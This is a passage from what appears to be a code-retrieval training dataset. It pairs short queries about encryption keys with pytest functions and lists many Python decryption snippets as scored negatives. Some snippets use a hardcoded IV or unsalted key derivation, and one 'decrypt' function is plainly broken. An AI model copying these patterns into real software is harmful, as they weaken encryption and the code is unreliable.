str:\n\n key_len = len(key)\n decrypted = ''\n\n # Go through the encrypted string in chunks the length of the key\n for i in range(0, len(encrypted), key_len):\n chunk = encrypted[i:i + key_len] # Pull out a chunk the size of the key\n\n # Apply the key to the chunk\n for j, c in enumerate(chunk):\n decrypted += chr(ord(key[j]) ^ ord(c))\n\n return decrypted", "def private_key(self):", "def decryptEncryptionKey(cipherString, key):\n\tencryptionType, iv, cipherText, mac = decodeCipherString(cipherString)\n\t# log.debug(\"mac:%s\", mac)\n\t# log.debug(\"iv:%s\", iv)\n\t# log.debug(\"ct:%s\", cipherText)\n\tassert mac is None\n\tif encryptionType != 0:\n\t\traise UnimplementedError(\"can not decrypt type:%s\" % encryptionType)\n\tcipher = cryptography.hazmat.primitives.ciphers.Cipher(\n\t algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n\tdecryptor = cipher.decryptor()\n\tplainText = decryptor.update(cipherText) + decryptor.finalize()\n\t# log.debug(\"mackey before unpad:%s\", plainText[32:])\n\treturn plainText[:32], plainText[32:64]", "def decrypt(self, key, value):\n key = hashlib.sha256(key).digest()[:self.BLOCK_SIZE]\n iv = value[:16]\n crypted = value[16:]\n cipher = AES.new(key,AES.MODE_CBC,iv)\n return self.pkcs5_unpad(cipher.decrypt(crypted))", "def _decrypt_pvtkey(self, pvtkey_file: str, passphrase: str) -> str:\n\n keydata: str = None\n if pvtkey_file:\n try:\n keydata = asyncssh.public_key.read_private_key(pvtkey_file,\n passphrase)\n except Exception as e:\n self.logger.error(\n f\"ERROR: Unable to read private key file {pvtkey_file}\"\n f\"for jump host due to {str(e)}\")\n\n return keydata", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def decrypt(encryption_value):\n Common.logger.info(\"Decryption job started started\")\n key = Common.get_config_value(\"jenkins_key\")\n fkey = Fernet(key.encode())\n decrypt_value = fkey.decrypt(encryption_value.encode())\n return decrypt_value", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def decrypt(project_id, location_id, key_ring_id, crypto_key_id,\n ciphertext_file_name, plaintext_file_name):\n\n # Creates an API client for the KMS API.\n kms_client = googleapiclient.discovery.build('cloudkms', 'v1')\n\n # The resource name of the CryptoKey.\n name = 'projects/{}/locations/{}/keyRings/{}/cryptoKeys/{}'.format(\n project_id, location_id, key_ring_id, crypto_key_id)\n\n # Read encrypted data from the input file.\n with io.open(ciphertext_file_name, 'rb') as ciphertext_file:\n ciphertext = ciphertext_file.read()\n\n # Use the KMS API to decrypt the data.\n crypto_keys = kms_client.projects().locations().keyRings().cryptoKeys()\n request = crypto_keys.decrypt(\n name=name,\n body={'ciphertext': base64.b64encode(ciphertext).decode('ascii')})\n response = request.execute()\n plaintext = base64.b64decode(response['plaintext'].encode('ascii'))\n\n # Write the decrypted data to a file.\n with io.open(plaintext_file_name, 'wb') as plaintext_file:\n plaintext_file.write(plaintext)\n\n print('Saved plaintext to {}.'.format(plaintext_file_name))", "def dh_decrypt(priv, ciphertext):\n Group1,private, public = dh_get_key()#generate new DH pair for Bob\n iv=ciphertext[0]\n cipher=ciphertext[1]\n tag=ciphertext[2]\n pubA=ciphertext[3]\n \n #Bob derives shared secret key by multiplying his public key with Alice's private key\n shared2 = pubA.pt_mul(priv)#qA * dB\n print \"key from dec is\", shared2\n\n hashedKey=sha256(shared2.export()).digest()\n \n aes = Cipher(\"aes-128-gcm\")\n plain = aes.quick_gcm_dec(hashedKey[:16], iv, cipher, tag)#where to get IV and tag from ???\n \n return plain.encode(\"utf8\")", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def decrypt(private_key, ciphertext):\n if len(ciphertext) < 512 + 16:\n return None\n msg_header = ciphertext[:512]\n msg_iv = ciphertext[512:512+16]\n msg_body = ciphertext[512+16:]\n try:\n symmetric_key = PKCS1_OAEP.new(private_key).decrypt(msg_header)\n except ValueError:\n return None\n if len(symmetric_key) != 32:\n return None\n return AES.new(symmetric_key,\n mode=AES.MODE_CFB,\n IV=msg_iv).decrypt(msg_body)", "def decrypt_data(data, encryption_key):\n assert isinstance(data, str)\n obj = AES.new(encryption_key, AES.MODE_CBC, 'This is an IV456')\n bytes_data = bytes.fromhex(data)\n return Pad.unpad(obj.decrypt(bytes_data)).decode()", "def decrypt_data ( aes_key, data ) :\n decoded_data = decode_data( data )\n salt = decoded_data[ 0 : Crypto.Cipher.AES.block_size ]\n encrypted_data = decoded_data[ Crypto.Cipher.AES.block_size : ]\n cipher = Crypto.Cipher.AES.new( aes_key, Crypto.Cipher.AES.MODE_CFB, salt )\n decrypted_data = cipher.decrypt( encrypted_data )\n\n return decrypted_data", "def decrypt(ciphertext: str) -> Iterable:\n return simplesubstitution.decrypt(KEY, ciphertext)", "def xor_decrypt(ciphertext, key):\n\n\tdecrypted_char = ''\n\tdecrypted_str = ''\n\n\tfor char in ciphertext:\n\t\tdecrypted_char = chr(char ^ key)\n\t\tdecrypted_str += decrypted_char\n\n\treturn decrypted_str", "def decryptByteArray(self, data, keyobj):\n raise NotImplementedError(\"Is abstract\")", "def decode(key: str, enc: str) -> str:\n\n dec = []\n enc = base64.urlsafe_b64decode(enc).decode()\n for i in range(len(enc)):\n key_c = key[i % len(key)]\n dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)\n dec.append(dec_c)\n return \"\".join(dec)", "def _decrypt_secret(\n self, \n encryption_key: str,\n secret_list: List,\n secret_name: str\n ):\n f = Fernet(\n bytes(encryption_key, \"utf-8\")\n )\n secret=None\n if 'secrets' in secret_list:\n if secret_name in secret_list['secrets']:\n secret = f.decrypt(\n bytes(secret_list['secrets'][secret_name], \"utf-8\")\n ).decode('UTF-8')\n #self.log.log_success(\n # f'{secret_name} : {secret}'\n #)\n return secret", "def decrypt_vigenere(ciphertext: str, keyword: str) -> str:\n plaintext = \"\"\n # PUT YOUR CODE HERE\n key_lenght = len(keyword)\n text_lenght = len(ciphertext)\n\n while key_lenght != text_lenght:\n keyword += keyword\n key_lenght = len(keyword)\n if key_lenght > text_lenght:\n keyword = keyword[:text_lenght]\n key_lenght = len(keyword)\n code_key = []\n ord_a = ord('a')\n ord_A = ord('A')\n\n if ciphertext.islower():\n for i in range(key_lenght):\n if ciphertext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_a)\n code_text = []\n for n in range(text_lenght):\n if ciphertext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(ciphertext[n]) - ord_a)\n for u in range(text_lenght):\n if ciphertext[u] == \" \":\n value = ord(\" \")\n else:\n\n value = ((code_text[u] - code_key[u] + 26) % 26) + ord_a\n plaintext += chr(value)\n else:\n for i in range(key_lenght):\n if ciphertext[i] == \" \":\n code_key.append(\" \")\n else:\n code_key.append(ord(keyword[i]) - ord_A)\n code_text = []\n for n in range(text_lenght):\n if ciphertext[n] == \" \":\n code_text.append(\" \")\n else:\n code_text.append(ord(ciphertext[n]) - ord_A)\n for u in range(text_lenght):\n if ciphertext[u] == \" \":\n value = ord(\" \")\n else:\n value = ((code_text[u] - code_key[u] + 26) % 26) + ord_A\n plaintext += chr(value)\n\n return plaintext", "def decrypt_file(self, file_name, key):\n with open(file_name, 'rb') as fo:\n try:\n ciphertext = fo.read()\n except:\n print \"[-] Error opening file {0} for reading.\".format(file_name)\n return\n try:\n dec = self.decrypt(ciphertext, key)\n except:\n print \"[-] Decryption failed.\"\n return\n\n with open(file_name[:-4], 'wb') as fo:\n try:\n fo.write(dec)\n except:\n print \"[-] Error writing out file {0}\".format(file_name[:-4])\n return\n\n os.chmod(file_name[:-4], 0600)\n return file_name[:-4]", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def decrypt(self, ciphertext, key):\n iv = ciphertext[:AES.block_size]\n cipher = AES.new(key, AES.MODE_CBC, iv, segment_size=64)\n plaintext = cipher.decrypt(ciphertext[AES.block_size:])\n return self.pkcs7_unpad(plaintext)", "def decrypt(code):\n f = Fernet(settings.SECRET_KEY)\n return f.decrypt(code).decode('ascii')", "def decrypt(ciphertext, pad):\n\n return OR(ciphertext, pad)", "def verify_decrypt_key(self):\r\n\t\tpercent_english = Dict_Control(self.my_code).check_key()\r\n\t\t#If more than half the words are english, the key will pass. \r\n\t\tif percent_english > 50:\r\n\t\t\tself.right_key = False\r\n\t\t#If the key does not pass, the program will give you a warning and prompt you for another key. \r\n\t\telse: \r\n\t\t\tprint(f\"After decryption, it looks like only {percent_english}% of your words are english, you may have entered the wrong key?\")", "def test_set_private_key_setter(self) -> None:\n\n expected = self.pem_private_key.decode()\n\n encryptor = DataEncryption()\n encryptor.set_private_key(self.pem_private_key)\n\n # pylint: disable=protected-access\n actual = encryptor._loaded_private_key.private_bytes(\n serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8,\n serialization.NoEncryption(),\n ).decode()\n\n self.assertEqual(expected, actual)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def key_down(key):\n vk = key\n # XXX exception if >= 256\n _key_down(vk)", "def rsa_decrypt(self, thing):\n return self.true_private_key.decrypt(\n thing,\n cryptography.hazmat.primitives.asymmetric.padding.OAEP(\n mgf=cryptography.hazmat.primitives.asymmetric.padding.MGF1(\n algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )" ]
[ "0.6593434", "0.6539305", "0.6523048", "0.65177274", "0.65156114", "0.6480838", "0.645648", "0.63991714", "0.63842076", "0.63480246", "0.634022", "0.6332533", "0.6332092", "0.631312", "0.62985706", "0.6246969", "0.6217749", "0.6211802", "0.6208556", "0.62013805", "0.6200206", "0.61917937", "0.61856425", "0.61591977", "0.61469704", "0.6130895", "0.61282086", "0.6117785", "0.6110495", "0.61065316", "0.6098602", "0.6087869", "0.6067118", "0.6059401", "0.60250145", "0.6014754", "0.6007378", "0.5992755", "0.59698784", "0.593554", "0.5933101", "0.58959746", "0.5889789", "0.58644414", "0.5859084", "0.5851036", "0.58326095", "0.5829949", "0.58200765", "0.5817937", "0.5804816", "0.57977164", "0.57821375", "0.5776229", "0.57745695", "0.5769266", "0.5764061", "0.5763407", "0.5756936", "0.5752143", "0.5747892", "0.5745901", "0.5739412", "0.5737317", "0.57232386", "0.57232386", "0.5721613", "0.5714002", "0.5709414", "0.5709279", "0.5707425", "0.5696489", "0.56954706", "0.5693621", "0.5678598", "0.5677957", "0.56733584", "0.56671864", "0.5665989", "0.56659573", "0.56637526", "0.56580436", "0.56489563", "0.5640701", "0.5630843", "0.5630795", "0.56302893", "0.56301093", "0.5620199", "0.5616181", "0.5605914", "0.56022054", "0.56010956", "0.55969805", "0.5595972", "0.559252", "0.5589714", "0.5585233", "0.55850416", "0.55739594" ]
0.69840544
0
It requires a 32byte key.
def test_decrypt_key_invalid(self): encrypted = encrypt('message', key=b'0' * 32) with pytest.raises(EncryptionError): decrypt(encrypted, key=b'0' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, key: bytes):\n\n if len(key) != 32:\n raise ValueError('Key must be 32 bytes long')\n self.key = key", "def create_key ():", "def __init__(self, key):\n self.bs = 16\n self.key = hashlib.sha256(key.encode()).digest()", "def load_key():", "def test_long():\n key = 'A' * 242\n hashed_key = '%s[3705915182]' % ('A' * 229)\n full_key = 'prefix:1:%s' % hashed_key\n assert full_key == make_key(key, 'prefix', 1)", "def __init__(self, key: bytearray):\n self.__key = key\n self.__KSA(bytearray([i for i in range(256)]))", "def __init__(self,key):\n self.block_size = 32\n self.key = hashlib.sha256(key).digest()", "def key():", "def key(key):\n return key", "def load_key(self, type, keyid):\n pass", "def keyIndex(self, key):\n key ^= bsr(key, 33)\n key *= 0xff51afd7ed558ccdL\n key ^= bsr(key, 33)\n key *= 0xc4ceb9fe1a85ec53L\n key ^= bsr(key, 33)\n return key", "def __init__(self, key):\n self.key = key\n self.BLOCK_SIZE = 16", "def generate_random_key():\n return '%030x' % (random.randrange(256**15),)", "def key():\n pass", "def key():\n pass", "def _get_raw_key(self, key_id):", "def _GetKeyString(self):", "def _GetKeyString(self):", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16), int(key[2] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def key_for_bucket(self, key):\n\n try:\n return int(key[0] // 16), int(key[1] // 16)\n except ValueError:\n return KeyError(\"Key %s isn't usable here!\" % repr(key))", "def generate_key():\n return get_random_bytes(KEY_SIZE)", "def _newKey(self, key):\n pass", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def generate_key():\n\tkey = [ randint(0,255) for i in range(16) ]\n\treturn bytes( key )", "def _set_key(self, key):\n\n # select 56 bits from the 64-bit key\n key = self._permutate(self.__pc1, self._string_to_bitlist(key))\n self.L = key[:28]\n self.R = key[28:]\n for i in range(0, 16):\n for j in range(0, self.__left_rotations[i]):\n self.L.append(self.L[0])\n del self.L[0]\n self.R.append(self.R[0])\n del self.R[0]\n # select 48 bits from 56 bits\n self.Kn[i] = self._permutate(self.__pc2, self.L + self.R)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def isValidKey(key):\n return True", "def key_id(cls, url: str):\r\n ...", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def hashId(key, size):\n return sum([ord(c) for c in key]) % size", "def get_key_id(self):", "def hash_key(self, key):\r\n hashed_key = sum((ord(char) for char in key))\r\n return hashed_key % 20", "def generate_key(self)->bytes:\n return os.urandom(32)", "def __init__(self, key):\n self._block_size = AES.block_size\n self._key = hashlib.sha256(get_as_bytes(key)).digest()", "def load_key(self, key):\n self.key = key", "def private_key(self):", "def public_key(self):", "def generate_key():\n return unicode(hashlib.sha224(str(random.getrandbits(128))).hexdigest())", "def _key_hash(self, key):\n\n split_key = key.strip(' ').split(' ')[1]\n return int(split_key)", "def safe_key(key, key_prefix, version):\r\n\r\n # Clean for whitespace and control characters, which\r\n # cause memcache to raise an exception\r\n key = cleaned_string(key)\r\n key_prefix = cleaned_string(key_prefix)\r\n version = cleaned_string(version)\r\n\r\n # Attempt to combine the prefix, version, and key\r\n combined = \":\".join([key_prefix, version, key])\r\n\r\n # If the total length is too long for memcache, hash it\r\n if len(combined) > 250:\r\n combined = fasthash(combined)\r\n\r\n # Return the result\r\n return combined", "def _check_key(self, key):\n raise NotImplementedError", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def RequireScriptHash(key):\n Require(len(key) == 20)\n return True", "def hex_key(uid: Text, mp: Text) -> Text:\n\n key = sha256(mp.encode('utf-8') + admin_pass.encode('utf-8')).hexdigest()\n return sha256(uid.lower().encode('utf-8') + key.encode('utf-8')).hexdigest()[:40]", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def gen_key():\n key = os.urandom(32) # 256 bit\n return base64.b64encode(key).rstrip('=') # strip off padding", "def key_size(self) -> int:\n pass", "def key_size(self) -> int:\n pass", "def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)", "def from_key(self, public_id, key):\n otp = self.get_otp(key)\n from_key = modhex_encode(public_id.encode('hex')) + modhex_encode(otp.encode('hex'))\n return from_key", "def __init__(self, key):\n self.key = key", "def MakeKey(self, string, string_1, string_2):\n ...", "def prepare_key(self, key):\n return smart_str(key)", "def proper_key(key, klen):\n ckey = \"\"\n if len(key) < klen:\n lmulti = math.floor(klen/len(key))\n lmod = klen % len(key)\n ckey = key * int(lmulti) + key[:lmod]\n elif len(key) > klen:\n ckey = key[:klen]\n else:\n ckey = key\n return ckey", "def _safe_key(self, key):\n if isinstance(key, str):\n key = key.encode('UTF-8')\n return key", "def generate_random_key(self):\n self.key = ''.join(choice(ascii_letters + digits) for i in range(300))", "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def __init__(self, aKey):\n self.key = aKey\n\n # CRC can be used to validate a key (very roughly)\n # if you store the CRC from a previous keyword\n # and then compare with a newly generated one and\n # they are the same then chances are the keyword\n # is correct - only a single byte so not that reliable\n self.crc = 0 \n for x in self.key:\n intX = ord(x)\n self.crc = self.crc ^ intX", "def test_get_key_digest_with_integer_key(self):\n\n digest = self.as_connection.get_key_digest(\"test\", \"demo\", 1)\n\n assert isinstance(digest, bytearray)", "def _key_array(key):\n key = map(ord, key)[:16]\n initial = map(ord, \"6170383452343567\")\n while len(key) < len(initial):\n key.append(initial[len(key)])\n return key", "def load_key(self):\n\t return open(\"key.key\", \"rb\").read()", "def entry(from_code, key):\n # turn code to hexadecimal\n from_code = DC.uniToHex(from_code)\n\n en = DESEncode()\n string_len = len(from_code)\n\n if string_len < 1:\n print 'error input'\n return False\n key_code = en.encode(from_code, key, string_len)\n return key_code", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def create_key(message, key):\n if len(key) > len(message):\n return key[0:len(message)]\n new_key = key * int(len(message)/len(key))\n new_key += key[0:len(message) - len(new_key)]\n return new_key", "def __generate_key(length):\n if length % 2 != 0:\n raise ValueError(\"'length' must be a multiple of 2\")\n length_bytes = int(length / 2) # length of key in bytes\n key_bytes = os.urandom(length_bytes)\n return binascii.hexlify(key_bytes).decode()", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def generate_aes_key ( ) :\n import hashlib\n sr = Crypto.Random.random.StrongRandom( )\n key_bits = sr.getrandbits( 256 )\n sha_key = hashlib.sha256( str( key_bits ) ).digest( )\n return sha_key", "def test_generate_key(self): \n k = Key().generate()\n self.assertRegex(k, \"[a-zA-Z0-9+\\/]+={0,2}\")", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def __init__(self, key):\n if len(key) > KEY_SIZE:\n raise ParameterError(\"Key must be <%d bytes\" % (KEY_SIZE))\n\n self.key = key.ljust(KEY_SIZE, b\"\\xff\")\n self.encryptIV = b\"\\xff\" * BLOCK_SIZE\n self.decryptIV = b\"\\xff\" * BLOCK_SIZE\n self.remainingData = b\"\"\n self.oldDecrypt = b\"\"", "def load_key():\n return open(\"secret.key\", \"rb\").read()", "def get_random_key(self, size=16):\n key = ''.join([random.choice(Characters.get_characters()) for i in range(size)])\n return self.__strengthen_key(key)", "def _encode_key(self, key: str) -> str:\n return key", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def __init__(self, key=None):\n self.key = key", "def _filesystem_safe_encode(key):\n return hashlib.sha256(key.encode()).hexdigest()", "def hash_key(self):", "def generate_key():\r\n\t\treturn ''.join(random.SystemRandom().choice(string.ascii_lowercase) for _ in range(123))", "def load(self, key: str) -> str:\n pass", "def unique_key(size):\n # Charset to create keys from\n charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'\n l = len(charset)-1\n bad_key = 1\n\n # Get a new seed\n ran.seed()\n\n while(bad_key > 0):\n # Create key\n key = list()\n for i in range(size):\n r = ran.randint(0, l)\n key.append(charset[r])\n key = \"\".join(key)\n\n # Check key\n bad_key = check_key(key)\n\n return(key)", "def JAVA_NATIVE(key):\n h = 0\n l = len(key)\n for (idx,c) in enumerate(key):\n h += ord(c)*31**(l-(idx+1))\n return _signed_int32(h)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def key_upload(self, key=None):\n raise NotImplementedError", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def genKey(length=32):\r\n return os.urandom(length)", "def key_handler(args):\n key = create_key(args.key_type, args.key_size, args.key_out)\n\n if not args.key_out:\n print(print_key(key))\n\n return key", "def keyGen(key):\n def leftShift(keyBitList):\n \"\"\"Perform a circular left shift on the first and second five bits\"\"\"\n shiftedKey = [None] * KeyLength\n shiftedKey[0:9] = keyBitList[1:10]\n shiftedKey[4] = keyBitList[0]\n shiftedKey[9] = keyBitList[5]\n return shiftedKey\n\n # Converts input key (integer) into a list of binary digits\n keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]\n permKeyList = [None] * KeyLength\n for index, elem in enumerate(P10table):\n permKeyList[index] = keyList[elem - 1]\n shiftedOnceKey = leftShift(permKeyList)\n shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))\n subKey1 = subKey2 = 0\n for index, elem in enumerate(P8table):\n subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]\n subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]\n return (subKey1, subKey2)", "def game_key(proto_obj):\n return game_key_full(proto_obj.id_str)", "def test_getKey_tmpfile(self):\n filename = self.mktemp()\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! type=%r\" % type(key))", "def fullkey(self, key):\n if len(self.basekey) > 0:\n return \"{}:{}\".format(self.basekey, key)\n else:\n return key", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def _hash(self, key):\n if self.function == 'fnv':\n h = 2166136261\n for i in range(len(key)):\n h = (h * 16777619) ^ ord(key[i])\n return h\n elif self.function == 'add':\n h = 0\n for i in range(len(key)):\n h += ord(key[i])\n return h", "def serialize_key(key: str) -> bytes:\n return key.encode(\"utf-8\")", "def gen_api_key():\r\n m = hashlib.sha256()\r\n m.update(get_random_word(12))\r\n return unicode(m.hexdigest()[:12])", "def parse_key(self, key):\r\n if not key:\r\n self.aes = None # empty key == no encryption\r\n return self.parse_string(self.tmp) # must return size (see the next return)\r\n key.decode() # test availability\r\n size = len(key)\r\n for padding in (16, 24, 32): # fixed key size\r\n if size <= padding:\r\n break\r\n key += chr(0) * (padding - size)\r\n self.aes = AES.new(key)\r\n return self.parse_string(self.tmp) # if key changes you must update string\r", "def randkey():\n return binascii.b2a_hex(os.urandom(15))", "def test_generate_api_key():\n\n key = auth.generate_api_key() # returns a NamedTuple with api_key and hashed_key\n hashed_api_key = sha256(key.api_key.encode('utf-8')).hexdigest()\n assert hashed_api_key == key.hashed_key", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def h_python(key, N):\n return hash(key) % N", "def __LFSR(self, key: bytearray) -> int:\n x = key.pop()\n out = x ^ key[254] ^ key[244]\n key.append(out)\n return out" ]
[ "0.7998701", "0.7112175", "0.70670855", "0.70627075", "0.7016668", "0.6956229", "0.6922364", "0.69079906", "0.683496", "0.6793663", "0.6758785", "0.6736807", "0.6699168", "0.66464436", "0.66464436", "0.6582861", "0.6575875", "0.6575875", "0.6530098", "0.6464395", "0.64615387", "0.6431281", "0.6409816", "0.64072996", "0.6380205", "0.63691837", "0.6364988", "0.63445956", "0.6333884", "0.6314983", "0.62884396", "0.6287946", "0.62855154", "0.6284593", "0.6283395", "0.62778026", "0.6249145", "0.6238161", "0.6218663", "0.62180775", "0.621264", "0.6209929", "0.62098855", "0.6201968", "0.61832094", "0.6165452", "0.6164135", "0.6164135", "0.6163434", "0.61451197", "0.6144095", "0.61438715", "0.6131953", "0.6131367", "0.6125875", "0.61194044", "0.611741", "0.6115215", "0.60866535", "0.60843086", "0.6081425", "0.60729414", "0.6072409", "0.60693586", "0.6058629", "0.60384303", "0.60341585", "0.6024876", "0.60222065", "0.6010098", "0.6007422", "0.6002475", "0.5989427", "0.5988416", "0.5987336", "0.59869623", "0.5986533", "0.5982801", "0.597676", "0.5976266", "0.5974522", "0.5972237", "0.5956679", "0.5956074", "0.5949675", "0.59461755", "0.59422", "0.59389496", "0.59353095", "0.59326047", "0.5931608", "0.5909314", "0.59028125", "0.5902636", "0.58889735", "0.58841246", "0.58772516", "0.58753026", "0.58738846", "0.58708405", "0.5863783" ]
0.0
-1
It raises an error when an incorrect key is provided.
def test_decrypt_key_incorrect(self): right_key = b'0' * 32 wrong_key = b'1' * 32 encrypted = encrypt('message', key=right_key) with pytest.raises(EncryptionError): decrypt(encrypted, key=wrong_key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_key(self, key):\n raise NotImplementedError", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def _check_key(key): # type: (str) -> None\n if not key:\n raise ValueError('Key must not be empty.')\n if '.' in key:\n raise ValueError('Key must not contain dots.')", "def keyError():\n d = {}\n d['cat']", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr context.\")", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def __assert_option(self, key):\n\n if not self.has_option(key):\n raise KeyError(\"No such option.\")", "def test_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.dweet_for(self.my_thing_id, test_data, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def test_get_latest_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.get_latest_dweet_for(self.my_thing_id, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def test_get_single_different(single_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n single_bucket.get(\"key 2\")", "def test_config_key_error():\n c = 